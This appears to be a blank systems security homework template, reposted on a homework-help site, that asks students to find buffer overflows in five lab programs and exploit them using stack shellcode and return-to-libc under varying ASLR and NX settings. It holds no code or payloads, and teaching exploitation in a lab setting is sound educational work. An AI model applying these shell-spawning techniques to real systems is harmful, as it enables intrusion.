System Security Homework

profileSutony
HW4notes.docx
Home>Computer Science homework help>System Security Homework

Systems Security Homework #4

Student Name:

Student ID:

Start Time:

End Time:

Part 1: Identify vulnerable programs

1. Which of the programs exhibits a buffer overflow vulnerable?   Mark your answers in the table below. 

Program Name

Your Answer (1 point each)

p1

Yes/No

p2

Yes/No

p3

Yes/No

p4

Yes/No

p5

Yes/No

2. Explain how you determined your answers to the previous question. 

For each program, write your explanation between the lines below, add more space if needed. Include commands and screenshots as needed. (10 points: 2 points for each program)

a. Program P1:

b. Program P2:

c. Program P3:

d. Program P4:

e. Program P5:

Part 2: Exploit the vulnerability

Exploit each of the programs you found vulnerable using all applicable exploit techniques. 

The possible techniques are: 

1. !ASLR & !NX: ASLR and NX off, by executing shellcode on the stack. 

2. ASLR & !NX:  ASLR on and NX off, by executing shellcode on the stack.

3. !ASLR & NX:  ASLR off and NX on, using return-to-libc.

4. ASLR & NX: ASLR and NX on, using return-to-libc and a string built by your payload.

Use the text between the dashed lines (the next 2 pages) to report your exploits. Copy this text for every vulnerable program Pi. For instance, if you found that P1, P2, and P4 are vulnerable, the text between the dashed lines should be copied three times. One for each program. Remember that there are N possible exploits, and you can get full credit for finding N-2.

------------------------------------------   Program Pi   ---------------------------------------------------------

1. !ASLR & !NX:

a. Exploit the program using this technique!  (5 points)

Your answer must be a screenshot showing your payload and proving that it spawned a new shell. You can prove that you have reached a new shell by showing the shell PID before and after you run the payload (using $$), or by showing a gdb message saying that the program invoked a new shell. 

Put your answer here.

b. Explain how you constructed the payload shown in ‘a’.  (5 points)

Your answer should explain how you determined the payload size and how you found the addresses used in your payload. You will likely need to use gdb for that purpose. You don’t need to explain the theory behind the exploit technique, but we need to be able to reproduce your work. For instance, you don’t need to explain why you used &pop-ret(), but you need to explain how you found it. You can use the shellcode we used in the studios if one is required by the exploit technique.

Put your answer here.

0. ASLR & !NX

a. Same as ‘a’ above.

Put your answer here.

b. Same as ‘b’ above.

Put your answer here.

0. !ASLR & NX

a. Same as ‘a’ above.

Put your answer here.

b. Same as ‘b’ above.

Put your answer here.

0. ASLR & NX

a. Same as ‘a’ above.

Put your answer here.

b. Same as ‘b’ above.

Put your answer here.

------------------------------------------------------------------------------------------------------------------------------